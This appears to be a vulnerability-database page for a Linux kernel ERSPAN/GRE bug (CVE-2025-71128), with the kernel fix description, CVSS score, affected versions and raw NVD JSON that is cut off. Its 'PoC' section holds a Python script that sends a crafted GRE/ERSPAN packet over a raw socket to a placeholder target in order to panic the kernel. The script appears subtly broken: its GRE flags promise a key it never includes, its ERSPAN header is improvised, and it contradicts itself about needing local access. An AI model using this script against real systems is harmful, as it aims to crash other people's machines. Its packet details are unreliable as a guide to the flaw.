CVE-2025-71128

Description

In the Linux kernel, the following vulnerability has been resolved: erspan: Initialize options_len before referencing options. The struct ip_tunnel_info has a flexible array member named options that is protected by a counted_by(options_len) attribute. The compiler will use this information to enforce runtime bounds checking deployed by FORTIFY_SOURCE string helpers. As laid out in the GCC documentation, the counter must be initialized before the first reference to the flexible array member. After scanning through the files that use struct ip_tunnel_info and also refer to options or options_len, it appears the normal case is to use the ip_tunnel_info_opts_set() helper. Said helper would initialize options_len properly before copying data into options, however in the GRE ERSPAN code a partial update is done, preventing the use of the helper function. Before this change the handling of ERSPAN traffic in GRE tunnels would cause a kernel panic when the kernel is compiled with GCC 15+ and having FORTIFY_SOURCE configured: memcpy: detected buffer overflow: 4 byte write of buffer size 0 Call Trace: <IRQ> __fortify_panic+0xd/0xf erspan_rcv.cold+0x68/0x83 ? ip_route_input_slow+0x816/0x9d0 gre_rcv+0x1b2/0x1c0 gre_rcv+0x8e/0x100 ? raw_v4_input+0x2a0/0x2b0 ip_protocol_deliver_rcu+0x1ea/0x210 ip_local_deliver_finish+0x86/0x110 ip_local_deliver+0x65/0x110 ? ip_rcv_finish_core+0xd6/0x360 ip_rcv+0x186/0x1a0 Reported-at: https://launchpad.net/bugs/2129580

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.15:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE

Linux kernel < 修复版本 (使用GCC 15+和FORTIFY_SOURCE配置)

特定受影响版本需参考内核主线修复提交：35ddf66c65eff93fff91406756ba273600bf61a3

特定受影响版本需参考内核主线修复提交：b282b2a9eed848587c1348abdd5d83fa346a2743

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2025-71128
# This is a theoretical exploit demonstration
# Environment: Linux kernel with GCC 15+ and FORTIFY_SOURCE enabled
# Target: Systems with ERSPAN over GRE tunnel configured

import socket
import struct

def craft_erspan_packet():
    """
    Craft a malformed ERSPAN packet that triggers buffer overflow
    by not properly initializing options_len before options access.
    """
    # GRE header
    gre_header = struct.pack('!HH', 
        0x2000,  # Flags - ERSPAN type II
        0x88BE   # Protocol type - ERSPAN
    )
    
    # ERSPAN Platform Specific Header (triggers the vulnerability)
    # The issue occurs when options_len is not set before options access
    erspan_header = struct.pack('!BBH',
        0x10,    # Ver + VLAN info
        0x00,    # COS + Encap type
        0x0000   # Truncated session ID
    )
    
    # Malformed payload that causes options_len mismatch
    payload = b'A' * 64  # Data that triggers overflow detection
    
    packet = gre_header + erspan_header + payload
    return packet

def exploit():
    """
    Send crafted ERSPAN packet to trigger kernel panic.
    Requires ERSPAN GRE tunnel to be configured on target.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_GRE)
    
    # Target configuration (requires GRE tunnel with ERSPAN)
    target_ip = "TARGET_IP"  # Replace with target IP
    
    packet = craft_erspan_packet()
    s.sendto(packet, (target_ip, 0))
    
    print("Malicious ERSPAN packet sent")
    print("If target has ERSPAN GRE tunnel configured with vulnerable kernel,")
    print("this should trigger kernel panic: memcpy buffer overflow")

if __name__ == "__main__":
    print("CVE-2025-71128 Conceptual PoC")
    print("Note: This PoC requires specific environment conditions:")
    print("1. Linux kernel compiled with GCC 15+")
    print("2. FORTIFY_SOURCE enabled in kernel config")
    print("3. ERSPAN GRE tunnel configured on target")
    print("4. Local access to send packets to the tunnel interface")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71128
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71128
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71128/
[4] VulDB https://vuldb.com/cve/CVE-2025-71128
[5] https://git.kernel.org/stable/c/35ddf66c65eff93fff91406756ba273600bf61a3
[6] https://git.kernel.org/stable/c/b282b2a9eed848587c1348abdd5d83fa346a2743

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71128", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:02.547", "lastModified": "2026-03-25T18:51:56.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerspan: Initialize options_len before referencing options.\n\nThe struct ip_tunnel_info has a flexible array member named\noptions that is protected by a counted_by(options_len)\nattribute.\n\nThe compiler will use this information to enforce runtime bounds\nchecking deployed by FORTIFY_SOURCE string helpers.\n\nAs laid out in the GCC documentation, the counter must be\ninitialized before the first reference to the flexible array\nmember.\n\nAfter scanning through the files that use struct ip_tunnel_info\nand also refer to options or options_len, it appears the normal\ncase is to use the ip_tunnel_info_opts_set() helper.\n\nSaid helper would initialize options_len properly before copying\ndata into options, however in the GRE ERSPAN code a partial\nupdate is done, preventing the use of the helper function.\n\nBefore this change the handling of ERSPAN traffic in GRE tunnels\nwould cause a kernel panic when the kernel is compiled with\nGCC 15+ and having FORTIFY_SOURCE configured:\n\nmemcpy: detected buffer overflow: 4 byte write of buffer size 0\n\nCall Trace:\n <IRQ>\n __fortify_panic+0xd/0xf\n erspan_rcv.cold+0x68/0x83\n ? ip_route_input_slow+0x816/0x9d0\n gre_rcv+0x1b2/0x1c0\n gre_rcv+0x8e/0x100\n ? raw_v4_input+0x2a0/0x2b0\n ip_protocol_deliver_rcu+0x1ea/0x210\n ip_local_deliver_finish+0x86/0x110\n ip_local_deliver+0x65/0x110\n ? ip_rcv_finish_core+0xd6/0x360\n ip_rcv+0x186/0x1a0\n\nReported-at: https://launchpad.net/bugs/2129580"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nerspan: Inicializar options_len antes de referenciar options.\n\nLa struct ip_tunnel_info tiene un miembro de array flexible llamado options que está protegido por un atributo counted_by(options_len).\n\nEl compilador usará esta información para aplicar la comprobación de límites en tiempo de ejecución implementada por los ayudantes de cadena de FORTIFY_SOURCE.\n\nComo se establece en la documentación de GCC, el contador debe ser inicializado antes de la primera referencia al miembro de array flexible.\n\nDespués de escanear los archivos que usan la struct ip_tunnel_info y también se refieren a options o options_len, parece que el caso normal es usar el ayudante ip_tunnel_info_opts_set().\n\nDicho ayudante inicializaría options_len correctamente antes de copiar datos en options, sin embargo, en el código GRE ERSPAN se realiza una actualización parcial, impidiendo el uso de la función ayudante.\n\nAntes de este cambio, el manejo del tráfico ERSPAN en túneles GRE causaría un pánico del kernel cuando el kernel es compilado con GCC 15+ y teniendo FORTIFY_SOURCE configurado:\n\nmemcpy: desbordamiento de búfer detectado: escritura de 4 bytes en un búfer de tamaño 0\n\nTraza de Llamada:\n \n __fortify_panic+0xd/0xf\n erspan_rcv.cold+0x68/0x83\n ? ip_route_input_slow+0x816/0x9d0\n gre_rcv+0x1b2/0x1c0\n gre_rcv+0x8e/0x100\n ? raw_v4_input+0x2a0/0x2b0\n ip_protocol_deliver_rcu+0x1ea/0x210\n ip_local_deliver_finish+0x86/0x110\n ip_local_deliver+0x65/0x110\n ? ip_rcv_finish_core+0xd6/0x360\n ip_rcv+0x186/0x1a0\n\nReportado en: https://launchpad.net/bugs/2129580"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15.1", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DD0A1B05-C008-4639-A2E7-32E5D447EA98"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.15:-:*:*:*:*:*:*", "matchCriteriaId": "A1ECC65A-EE37-4479-8E99-4BB68A22A31F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:lin ... (truncated)